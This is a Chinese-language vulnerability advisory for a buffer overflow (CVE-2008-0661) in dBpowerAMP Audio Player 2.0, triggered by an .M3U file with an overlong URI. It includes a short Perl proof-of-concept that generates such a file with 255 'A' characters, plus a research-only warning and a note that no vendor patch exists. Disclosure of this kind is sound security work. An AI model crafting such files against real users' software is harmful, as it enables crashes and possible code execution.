发布日期：2008-02-05
更新日期：2010-09-03

受影响系统：

dbpoweramp dbpoweramp 2.0

描述：

---

BUGTRAQ  ID: 27635
CVE(CAN) ID: CVE-2008-0661

dBpowerAMP Audio Player 是音频播放器。

dBpowerAMP Audio Player 2.0.0存在缓冲区溢出漏洞，远程攻击者通过带有较长URI的.M3U文件，利用此漏洞可执行任意代码。

<*来源：securfrog （securfrog@gmail.com）
  
  链接：http://www.securityfocus.com/archive/1/archive/1/487605/100/0/threaded
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

my $file="bob_marley_I_Shot_The_Sheriff.m3u";

open(my $FILE, ">>$file") or die "Cannot open $file: $!";

print $FILE "http://"."A" x 255;

close($FILE);

print "$file has been created \n";

print "Credits:Securfrog";

建议：

---

厂商补丁：

dbpoweramp
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://dbpoweramp.com/dbpoweramp.htm

浏览次数：1571
严重程度：0（网友投票）